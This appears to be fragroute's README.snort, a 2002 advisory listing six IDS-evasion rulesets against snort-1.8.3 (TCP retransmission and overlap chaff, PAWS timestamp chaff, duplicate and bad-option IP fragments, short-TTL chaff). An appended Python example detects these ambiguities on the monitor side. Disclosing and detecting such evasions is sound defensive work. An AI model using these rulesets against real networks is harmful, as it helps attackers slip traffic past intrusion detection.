README.snort

attacks against snort-1.8.3, reported Jan 28, 2002:

1. older TCP retransmission chaff (snort's TCP segment reassembly
   seems to always favor newer data, even for properly sequenced
   received data):

        tcp_seg 1
        tcp_chaff rexmit
        order random

2. forward TCP segmentation overlap, favoring newer data (both Windows
   and Unix operate this way, in contrast to Ptacek and Newsham's
   results):

        tcp_seg 1 new

3. chaff TCP segments with older TCP timestamp options forcing PAWS
   elimination:

        tcp_seg 1
        tcp_chaff paws
        order random

4. older IP fragment duplicates (snort's IP fragment reassembly seems
   to always favor newer data, even for properly sequenced received
   data):

        ip_frag 8
        ip_chaff dup
        order random

5. IP duplicate fragment chaff with bad options:

        ip_frag 8
        ip_chaff opt
        order random

6. either TCP or IP chaffing with short TTLs (that expire before
   reaching the end host, but pass by the monitor):

        ip_frag 8
        ip_ttl 11
        ip_chaff 10
        order random

        tcp_seg 1
        ip_ttl 11
        tcp_chaff 10
        order random

there are probably timing attacks against snort's reassembly possible
as well, but i haven't played with it enough to see.
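
Added example (not part of the original README or of fragroute): a monitor-side check in Python that flags, within one direction of a TCP flow, the ambiguities the rulesets above depend on: overlapping segments whose bytes disagree, timestamps older than one already seen, and TTL variance. The Seg record, the finding names, the ttl_slack threshold and the sample data are assumptions constructed for illustration.

```python
from collections import namedtuple

# Hypothetical per-segment record as a monitor would log it (constructed schema).
Seg = namedtuple("Seg", "seq data ttl tsval")

def audit_flow(segs, ttl_slack=0):
    """Return (findings, first_wins, last_wins) for one direction of a TCP flow."""
    first, last = {}, {}   # stream offset -> byte, under each overlap policy
    findings, ttls, max_ts = set(), set(), None
    for s in segs:
        ttls.add(s.ttl)
        # An end host applying PAWS discards a segment whose timestamp is older
        # than one it has already accepted; a monitor that ignores this keeps it.
        if max_ts is not None and s.tsval < max_ts:
            findings.add("old-timestamp")
        max_ts = s.tsval if max_ts is None else max(max_ts, s.tsval)
        for i, b in enumerate(s.data):
            off = s.seq + i
            # Same offset, different byte: the result depends on overlap policy.
            if off in last and last[off] != b:
                findings.add("inconsistent-overlap")
            first.setdefault(off, b)
            last[off] = b
    # Segments with a much lower TTL may expire between monitor and end host.
    if ttls and max(ttls) - min(ttls) > ttl_slack:
        findings.add("ttl-variance")
    def build(m):
        return bytes(m[o] for o in sorted(m))
    return findings, build(first), build(last)

# Constructed sample: 1-byte segments with conflicting duplicates mixed in.
SAMPLE = [
    Seg(0, b"a", 64, 100), Seg(0, b"X", 64, 100),   # conflicting retransmission
    Seg(1, b"b", 64, 101),
    Seg(2, b"c", 64, 102), Seg(2, b"Y", 64, 90),    # older timestamp
    Seg(3, b"d", 64, 103), Seg(3, b"Z", 5, 103),    # short TTL
]
# Constructed benign flow: an exact retransmission raises no finding.
CLEAN = [Seg(0, b"ab", 64, 100), Seg(2, b"cd", 64, 101), Seg(0, b"ab", 64, 102)]

if __name__ == "__main__":
    print(audit_flow(SAMPLE))
    print(audit_flow(CLEAN))
```

When the first-wins and last-wins streams differ, a monitor and the end host can reconstruct different data, so the monitor's overlap policy has to match the hosts it protects.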